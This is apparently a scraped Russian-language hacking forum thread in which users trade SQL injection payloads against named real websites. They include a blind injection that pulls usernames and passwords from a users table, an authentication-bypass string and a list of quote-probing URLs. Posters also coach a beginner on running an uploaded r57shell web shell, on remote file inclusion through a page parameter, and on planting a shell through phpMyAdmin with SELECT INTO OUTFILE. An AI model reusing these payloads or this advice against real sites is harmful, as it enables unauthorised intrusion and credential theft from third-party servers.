нужно просто отрезать лишнее _http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+or+password=1/*
все равно донт акссес заодно если не тяжело посмотрите плиз вот я все унионы перепробовал до 34-го, чет никакого результата.
Мор1ров заюзай http://www.privateurl.com/index.php?trans_lang=eng&langid=&username=user'+and+if(ascii(substring((select+concat_ws(0x2F,username,password)+from+users+limit+0,1),1,1))>1,1,(select+1+union+select+2))=1--+ А доступа нет возможно потому что ты не авторизирован. Попробуй зарегиться
Не, ну это я знаю... Я видел такую фиговину, с названием RFI SQL INJ которая выглядила как то так: http://www.centralpets.com/php/search/storiesdisplay.php?Story='83 http://www.centralpets.com/php/search/storiesdisplay.php?Story=\'83 http://www.centralpets.com/php/search/storiesdisplay.php?Story=%00'83 http://www.centralpets.com/php/search/storiesdisplay.php?Story="83 http://www.centralpets.com/php/search/storiesdisplay.php?Story=%3D83 http://www.centralpets.com/php/search/storiesdisplay.php?Story=%252783 http://www.centralpets.com/php/search/storiesdisplay.php?Story='"83 http://www.centralpets.com/php/search/storiesdisplay.php?Story=\"83 http://www.centralpets.com/php/search/storiesdisplay.php?Story="+and+1=0+--+83 http://www.centralpets.com/php/search/storiesdisplay.php?Story=)83
-m0rgan-, всё что видно по твоему логу, это попытка подобрать то какой вид кавычки нужен, нужна ли закрывающая скобка или не нужна вообще. (Да и то както криво с учётом того, где находится число 83) З.Ы. К RFI отношения не имеет.
подскажите новичку залил шель r57shell 1.3 как теперь его запустить и еще что означает иньекция и инклуд
Чтобы запустить шелл, проследуй в ту директорию, в которую ты его залил, например ты заливаешь его в папку tmp, то гуляй по адресу www.site.com/tmp/shell.php. SQL-Injection – внедрение произвольного SQL-кода в исполняемый запрос PHP-include – возможность включения произвольного PHP-кода в исполняемый поток на стороне сервера.
здесь прочитал что шель можно залить и так http://wow.alania.net/?page=http://site.ru/shell.php если да то как его запустить если можете какую шель посаветуете если можно еще сылку на шели
Аааа, если так, то шелл отобразится по этом же адресу, то есть ты инклудишь свой шелл, на эту же страницу (http://wow.alania.net/?page=) Пример: Code: http://www.jiznicechy.org/en/index.php?path=http://forum.antichat.ru
В общем у меня вопрос следующего рода: есть сайт и есть доступ к phpmyadmin-у а когда пытаюсь залить шелл с помощью конструкции select into outfile выдает такой ответ #1045 - Access denied for user… собственно вопрос – что это значит? это типа у юзера не хватает прав или что? И что с этим можно сделать? И может, есть какой то другой способ залить шелл через phpmyadmin-а???
>>что это значит? Да, у юзера нет прав. >>что с этим можно сделать Зайти под юзером у которого есть права >>может, есть какой то другой способ залить шелл через phpmyadmin-а Если нет прав на запись, то нет Add: Есть ещё уязвимости самого пыхадмина: https://forum.antichat.ru/thread50669.html Возможно тебе повезёт
Как это можно использовать? /index.php?act=calendar&code=birthdays&y=2009&m=5&d=4 # user12 (19) # user45 (21) # user545 (17) # user74 (22) /index.php?act=calendar&code=birthdays&y[]=2009&m=5&d=4 # user587 (-1989) # user577 (-1987) # user5774 (-1991) # user5546 (-1986)
Поскажите как пользоваться? http://wow.alania.net/?page= Warning: include(./inc/.php) [function.include]: failed to open stream: No such file or directory in Y:\home\78.110.144.12\www\index.php on line 104 Warning: include() [function.include]: Failed opening './inc/.php' for inclusion (include_path='.;/usr/local/php5/PEAR') in Y:\home\78.110.144.12\www\index.php on line 104
